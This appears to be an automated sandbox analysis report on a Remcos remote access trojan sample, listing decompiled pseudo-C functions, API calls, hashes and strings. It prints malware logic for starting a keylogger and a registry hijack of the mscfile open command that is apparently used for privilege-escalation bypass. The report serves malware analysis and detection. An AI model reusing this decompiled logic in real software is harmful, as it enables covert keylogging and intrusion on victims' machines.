                                                                                • API ID: AllocConsoleShowWindowfreopenprintf
                                                                                • String ID: * BreakingSecurity.Net$ * Remcos v$2.7.2 Pro$CONOUT$
                                                                                • API String ID: 3419900118-1124569734
                                                                                • Opcode ID: b1b5080caeedf021356004c91e5e7e7175471eb2af215126cee024e722724922
                                                                                • Instruction ID: e9522ca3004100f4f480c0466296eb3066317ede3a0b8fd360cc0205dee7bfbf
                                                                                • Opcode Fuzzy Hash: b1b5080caeedf021356004c91e5e7e7175471eb2af215126cee024e722724922
                                                                                • Instruction Fuzzy Hash: DC213D36B406085BCB29DB7DDCD45EE7A97A7C4251B95827EF80BD73C0DEB08D488644
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 45%
                                                                                			E00405BC0(void* __ecx) {
                                                                                				char _v5;
                                                                                				char _v6;
                                                                                				void* _t8;
                                                                                				void* _t31;
                                                                                
                                                                                				_push(__ecx);
                                                                                				_t31 = __ecx;
                                                                                				if( *((intOrPtr*)(__ecx + 0x3d)) == 0) {
                                                                                					 *((char*)(__ecx + 0x3d)) = 1;
                                                                                					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v5);
                                                                                					E00405DD3(__ecx);
                                                                                					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                                                                					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                                                                					E0041203B("[INFO]",  &_v6, "Online Keylogger Started",  &_v5, "Online Keylogger Started");
                                                                                					if( *((intOrPtr*)(_t31 + 0x3c)) == 0) {
                                                                                						E00405156(_t31);
                                                                                						if( *_t31 == 0) {
                                                                                							CreateThread(0, 0, E0040526A, _t31, 0, 0);
                                                                                						}
                                                                                						CreateThread(0, 0, E00405299, _t31, 0, 0);
                                                                                					}
                                                                                					_t8 = CreateThread(0, 0, E004052A8, _t31, 0, 0);
                                                                                					 *(_t31 + 0x28) = _t8;
                                                                                				}
                                                                                				return _t8;
                                                                                			}








                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,Online Keylogger Started,?), ref: 00405BE7
                                                                                  • Part of subcall function 00405DD3: GetLocalTime.KERNEL32(?,00017838,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                                                                  • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                                                                  • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                                                                  • Part of subcall function 00405DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                                                                  • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                                                                  • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                                                                  • Part of subcall function 00405DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                                                                  • Part of subcall function 00405DD3: malloc.MSVCRT ref: 00405E37
                                                                                  • Part of subcall function 00405DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                                                                  • Part of subcall function 00405DD3: sprintf.MSVCRT ref: 00405E69
                                                                                  • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                                                                  • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                                                                  • Part of subcall function 00405DD3: SetEvent.KERNEL32(00000000), ref: 00405E95
                                                                                  • Part of subcall function 00405DD3: free.MSVCRT(00000000), ref: 00405E9C
                                                                                  • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Online Keylogger Started,?,?,?,Online Keylogger Started,?), ref: 00405BFE
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 00405C12
                                                                                  • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                                                                  • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                                                                  • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_000052A8,?,00000000,00000000), ref: 00405C58
                                                                                  • Part of subcall function 00405156: GetKeyboardLayout.USER32(00000000), ref: 0040515B
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000526A,?,00000000,00000000), ref: 00405C40
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005299,?,00000000,00000000), ref: 00405C4C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@CreateD@1@@ThreadV01@V10@$?c_str@?$basic_string@LocalTimeV10@@Y?$basic_string@$??4?$basic_string@?length@?$basic_string@EventKeyboardLayoutV01@@V10@0@freemallocprintfsprintf
                                                                                • String ID: Online Keylogger Started$[INFO]
                                                                                • API String ID: 3243250608-3343292223
                                                                                • Opcode ID: a8e662678da6ae76e9fc608fff52aafdf6fc640e70994fb474de8f560b873d38
                                                                                • Instruction ID: c910a21b19b54318fc77c553f5add3804aa9723349d7e3508c4a5a722b276437
                                                                                • Opcode Fuzzy Hash: a8e662678da6ae76e9fc608fff52aafdf6fc640e70994fb474de8f560b873d38
                                                                                • Instruction Fuzzy Hash: 4011E5A0604B0CBFF71077768CC6CBF7A6CDE81698740047EF40262281DAB95C448EB9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 20%
                                                                                			E0040E254(void* __eax, void* __eflags) {
                                                                                				void* _t7;
                                                                                				void* _t9;
                                                                                				void* _t28;
                                                                                
                                                                                				_t33 = __eflags;
                                                                                				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                                                                				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                				_t7 = E0040180C(_t28 - 0x10, __eflags, 0);
                                                                                				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                                                                				_t9 = E0040180C(_t28 - 0x10, _t33, 0);
                                                                                				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                				E0040B8F8(_t33, 0x80000001, _t9, "name", _t9, _t7 + 1, __eax, __eax, 3);
                                                                                				E004017DD(_t28 - 0x10);
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				return 0;
                                                                                			}







                                                                                APIs
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003), ref: 0040E25D
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040E266
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,00000000), ref: 0040E27A
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000001), ref: 0040E28D
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(name,00000000), ref: 0040E29E
                                                                                  • Part of subcall function 0040B8F8: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000), ref: 0040B934
                                                                                  • Part of subcall function 0040B8F8: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B950
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E6AC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@$??0?$basic_string@?length@?$basic_string@?size@?$basic_string@V01@@
                                                                                • String ID: name
                                                                                • API String ID: 4248281052-1579384326
                                                                                • Opcode ID: 03508dd26161fed5f6b9b92cfe1b6fd940dafe9083f5dda7ad429ebf3daae731
                                                                                • Instruction ID: 9ee346064aa2c941639b0d7d09d57cd35de4d8052a4636764cc5c845d749206a
                                                                                • Opcode Fuzzy Hash: 03508dd26161fed5f6b9b92cfe1b6fd940dafe9083f5dda7ad429ebf3daae731
                                                                                • Instruction Fuzzy Hash: 6DF01D72A00518DFDB05ABE1EC599FE7768EB94345B00843EE513A70E0EF780905CB5C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 64%
                                                                                			E00411AF5(void* __ecx, WCHAR* _a4) {
                                                                                				char _v5;
                                                                                				char _v6;
                                                                                				void* _t13;
                                                                                
                                                                                				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(__ecx);
                                                                                				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                                                                				E0041203B("[ALARM]",  &_v6, "Alarm has been triggered!",  &_v5, _t13);
                                                                                				PlaySoundW(_a4, GetModuleHandleA(0), 0x20009);
                                                                                				Sleep(0x2710);
                                                                                				return PlaySoundW(0, 0, 0);
                                                                                			}







                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Alarm has been triggered!,?,?,?,00411AE8,00000000), ref: 00411B08
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ALARM],?), ref: 00411B1C
                                                                                  • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                                                                  • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                                                                  • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                                                                • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00411B31
                                                                                • PlaySoundW.WINMM(?,00000000), ref: 00411B41
                                                                                • Sleep.KERNEL32(00002710), ref: 00411B48
                                                                                • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00411B54
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@PlaySoundV10@$?c_str@?$basic_string@HandleLocalModuleSleepTimeV10@0@V10@@printf
                                                                                • String ID: Alarm has been triggered!$[ALARM]
                                                                                • API String ID: 4004766653-1190268461
                                                                                • Opcode ID: 2e7e8d197215856fdaf9e2bc7310ab4df68db1472c87e26e2a014bf043a2bc13
                                                                                • Instruction ID: 5adc9307e5d744e325bca41e58bf78e276225457fadb31193265d37fe82570ce
                                                                                • Opcode Fuzzy Hash: 2e7e8d197215856fdaf9e2bc7310ab4df68db1472c87e26e2a014bf043a2bc13
                                                                                • Instruction Fuzzy Hash: 09F08971744218BFEA0077A5DC4BFED3E2DEB44741F400025FD01D61D4EAE069408AEA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 50%
                                                                                			E0040D8FF() {
                                                                                				void* _t10;
                                                                                				char* _t12;
                                                                                				int _t13;
                                                                                				char* _t15;
                                                                                				signed int _t16;
                                                                                				char* _t18;
                                                                                				void* _t41;
                                                                                				void* _t46;
                                                                                				intOrPtr _t51;
                                                                                
                                                                                				_t51 =  *0x41bf20; // 0x0
                                                                                				 *0x41c119 = 0;
                                                                                				if(_t51 != 0) {
                                                                                					E004020F4(_t10, 0x41bf20);
                                                                                				}
                                                                                				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E0040180C(_t46 - 0x10, _t51, 0));
                                                                                				_t12 = E0040180C(_t46 - 0x10, _t51, 3);
                                                                                				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                				_t13 = atoi(_t12);
                                                                                				E0040F572();
                                                                                				_t15 = E0040180C(_t46 - 0x10, _t51, 2);
                                                                                				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                				_t16 = atoi(_t15);
                                                                                				_t18 = E0040180C(_t46 - 0x10, _t16, 1);
                                                                                				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                				E0040F5F4(_t41, _t52, atoi(_t18), _t16 & 0xffffff00 | _t16 != 0x00000000, _t13);
                                                                                				E004017DD(_t46 - 0x10);
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				return 0;
                                                                                			}













                                                                                APIs
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000000), ref: 0040D928
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003), ref: 0040D93A
                                                                                • atoi.MSVCRT ref: 0040D947
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040D95E
                                                                                • atoi.MSVCRT ref: 0040D965
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000), ref: 0040D97A
                                                                                • atoi.MSVCRT ref: 0040D981
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E6AC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                                                                  • Part of subcall function 004020F4: #3.WS2_32(0041BE70,0041BE70,004021ED,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004020F9
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@atoi$??1?$basic_string@$??4?$basic_string@V01@V01@@
                                                                                • String ID:
                                                                                • API String ID: 705801113-0
                                                                                • Opcode ID: 7fad3e1c8d02ddd56982f4bb6be155314c8ce40a5711a40228cd6dab6938a153
                                                                                • Instruction ID: b6bede96aa3c2da0a069e28b117ba5bdb23d63fcfc1ec7a11f567b0dfa856408
                                                                                • Opcode Fuzzy Hash: 7fad3e1c8d02ddd56982f4bb6be155314c8ce40a5711a40228cd6dab6938a153
                                                                                • Instruction Fuzzy Hash: 8C111C72A00218DBCB04BBF1EC599EE7769EB94355B00883EE512E71E1EF784909CB5D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000), ref: 00403224
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040322D
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000,000003E8,00000000), ref: 0040324D
                                                                                  • Part of subcall function 0040B692: RegOpenKeyExA.KERNELBASE(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                                                                  • Part of subcall function 0040B692: RegQueryValueExA.KERNELBASE(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                                                                  • Part of subcall function 0040B692: RegCloseKey.KERNELBASE(0040936A), ref: 0040B6D3
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 00403278
                                                                                  • Part of subcall function 0040B708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                                                                  • Part of subcall function 0040B708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                                                                  • Part of subcall function 0040B708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                                                                  • Part of subcall function 0040B708: RegSetValueExA.KERNELBASE(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                                                                  • Part of subcall function 0040B708: RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                                                                  • Part of subcall function 0040B708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc), ref: 00403297
                                                                                  • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,origmsc), ref: 0040B96C
                                                                                  • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004032A4,?), ref: 0040B97C
                                                                                  • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4,80000001), ref: 0040B993
                                                                                  • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4), ref: 0040B9AB
                                                                                  • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9C2
                                                                                  • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9CB
                                                                                  • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9D4
                                                                                  • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9DD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$?c_str@?$basic_string@$??1?$basic_string@$G@2@@std@@G@std@@$??0?$basic_string@D@1@@$CloseValue$?length@?$basic_string@?size@?$basic_string@CreateOpenQuery
                                                                                • String ID: Software\Classes\mscfile\shell\open\command$origmsc
                                                                                • API String ID: 1883807236-2313358711
                                                                                • Opcode ID: 6164d948096cc69d9a41c6752b69c33c22d8fca847b1021a8e2a0f545ec2985b
                                                                                • Instruction ID: 820ff65b2e21daf85941f98613c9b2fccc28e61cad3948ad9cf2f03c1057e28e
                                                                                • Opcode Fuzzy Hash: 6164d948096cc69d9a41c6752b69c33c22d8fca847b1021a8e2a0f545ec2985b
                                                                                • Instruction Fuzzy Hash: E1110A72A40554B7DB0267A9DC55BEF7B6DCB85300F0040B6F905A72C1DA780B0647EE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BA28,00415800,00000000,80000001,0041BA38), ref: 0040AB4C
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040AB78
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AB81
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000,00000410,00000000), ref: 0040AB9E
                                                                                  • Part of subcall function 0040B692: RegOpenKeyExA.KERNELBASE(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                                                                  • Part of subcall function 0040B692: RegQueryValueExA.KERNELBASE(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                                                                  • Part of subcall function 0040B692: RegCloseKey.KERNELBASE(0040936A), ref: 0040B6D3
